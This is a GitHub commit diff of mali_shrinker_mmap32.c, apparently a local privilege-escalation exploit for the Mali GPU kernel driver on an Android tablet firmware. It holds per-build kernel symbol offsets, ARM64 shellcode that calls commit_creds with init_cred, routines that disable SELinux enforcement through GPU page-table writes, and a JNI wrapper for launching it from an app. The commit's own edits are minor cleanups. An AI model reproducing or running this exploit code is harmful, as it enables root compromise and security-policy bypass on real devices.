Skip to content

Commit

Permalink
Align mali_shrinker_mmap32.c
Browse files Browse the repository at this point in the history 
Signed-off-by: Syuugo <[email protected]>
  • Loading branch information
@s1204IT
s1204IT authored May 27, 2024
1 parent 6ca5647 commit 28b26ca
Showing 1 changed file with 15 additions and 29 deletions.
44 changes: 15 additions & 29 deletions mali_shrinker_mmap32.c
View file
Original file line number Diff line number Diff line change
Expand Up @@ -63,6 +63,7 @@
#define ADD_COMMIT_INDEX 3

/*
Need: kallsyms
KERNEL_BASE = do_undefinstr - 0x1000
COMMIT_CREDS = commit_creds - KERNEL_BASE
AVC_DENY= avc_denied.isra.4 - KERNEL_BASE
Expand All @@ -80,19 +81,19 @@ ADD_COMMIT = add x8, x8, #0x(Last 3 digits of INIT_CRED)
ADD_INIT = add x0, x0, #0x(Last 3 digits of INIT_CRED)
*/

/*
* Maintained by Syuugo
*/

// TAB-A05-BD 01.00.000
#define SELINUX_ENFORCING_CTX_01_00_000 0x129d9bc
#define SEL_READ_HANDLE_UNKNOWN_CTX_01_00_000 0x365d80 // 0xffffff80083e5d80 - 0xffffff8008080000 = 0x365d80
#define SEL_READ_ENFORCE_CTX_01_00_000 0x3653a8 // 0xffffff80083e53a8 - 0xffffff8008080000 = 0x3653A8 //add
#define INIT_CRED_CTX_01_00_000 0x11553f0 // 0xffffff80091d53f0 - 0xffffff8008080000 = 0x11553F0
#define COMMIT_CREDS_CTX_01_00_000 0x5a120 // 0xffffff80080da120 - 0xffffff8008080000 = 0x5a120
#define SEL_READ_HANDLE_UNKNOWN_CTX_01_00_000 0x365d80
#define SEL_READ_ENFORCE_CTX_01_00_000 0x3653a8
#define INIT_CRED_CTX_01_00_000 0x11553f0
#define COMMIT_CREDS_CTX_01_00_000 0x5a120
#define ADD_INIT_CTX_01_00_000 0x910fc000
#define ADD_COMMIT_CTX_01_00_000 0x91048108
#define AVC_DENY_CTX_01_00_000 0x35acc8 // 0xffffff80083dacc8 - 0xffffff8008080000 = 0x35ACC8 //add

/*
* Maintained by Syuugo
*/
#define AVC_DENY_CTX_01_00_000 0x35acc8

// TAB-A05-BD 01.01.001
#define COMMIT_CREDS_CTX_01_01_001 0x5a120
Expand Down Expand Up @@ -551,7 +552,6 @@ uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) {
}

void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit) {

uint32_t init_adpr = write_adrp(0, read_enforce, init_cred);
// Sets x0 to init_cred
root_code[ADRP_INIT_INDEX] = init_adpr;
Expand Down Expand Up @@ -580,7 +580,6 @@ void fixup_root_shell_nop() {
}

void fixup_root_shell_un(uint64_t init_cred, uint64_t commit_cred, uint64_t read_handle_unknown, uint32_t add_init, uint32_t add_commit) {

uint32_t init_adpr = write_adrp(0, read_handle_unknown, init_cred);
// Sets x0 to init_cred
root_code_un[ADRP_INIT_INDEX] = init_adpr;
Expand All @@ -594,7 +593,6 @@ void fixup_root_shell_un(uint64_t init_cred, uint64_t commit_cred, uint64_t read
root_code_un[7] = 0xd65f03c0; // ret
}


uint64_t set_addr_lv3(uint64_t addr) {
uint64_t pfn = addr >> PAGE_SHIFT;
pfn &= ~ 0x1FFUL;
Expand Down Expand Up @@ -637,7 +635,7 @@ void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, e
if (ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
err(1, "submit job failed\n");
}
usleep(500000);
usleep(300000);
}

void write_data(int mali_fd, uint64_t data, uint64_t* reserved, uint64_t size, uint64_t value, enum mali_write_value_type type) {
Expand Down Expand Up @@ -697,7 +695,7 @@ int run_enforce() {
return result;
}


/*
int run_enforce_write() {
char result = '0';
sleep(3);
Expand All @@ -710,6 +708,7 @@ int run_enforce_write() {
LOG("result %d\n", result);
return result;
}
*/

int run_enforce_un() {
char result = '2';
Expand Down Expand Up @@ -795,19 +794,6 @@ void select_offset() {
return;
}

/*
if (1) {
//avc_deny = 0x321C64; // avc_denied.isra.6
//selinux_enforcing_READ = 0x32CC2C ; // t sel_read_enforce
//selinux_enforcing_WRITE = 0x32E01C ; // t sel_read_enforce
selinux_enforcing = SELINUX_ENFORCING_neo;
sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_neo;
//fixup_root_shell(0x12253F0, 0x5B328, selinux_enforcing_WRITE, 0x910FC000, 0x910CA108);
//fixup_root_shell(0x12253F0, 0x5B328, selinux_enforcing_READ, 0x910FC000, 0x910CA108);
fixup_root_shell_un(INIT_CRED_neo, COMMIT_CREDS_neo, sel_read_handle_unknown, ADD_INIT_neo, ADD_COMMIT_neo);
return;
}
*/
err(1, "unable to match build id\n");
}

Expand All @@ -825,7 +811,7 @@ void write_selinux(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved)
}

void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) {
/*
/*
uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
Expand Down Expand Up @@ -972,7 +958,7 @@ int main() {
#else
#include <jni.h>
JNIEXPORT int JNICALL
Java_com_example_hellojni_MaliExpService_stringFromJNI( JNIEnv* env, jobject thiz)
Java_com_example_hellojni_MaliExpService_stringFromJNI(JNIEnv* env, jobject thiz)
{
setbuf(stdout, NULL);
setbuf(stderr, NULL);
Expand Down

0 comments on commit 28b26ca

Please sign in to comment.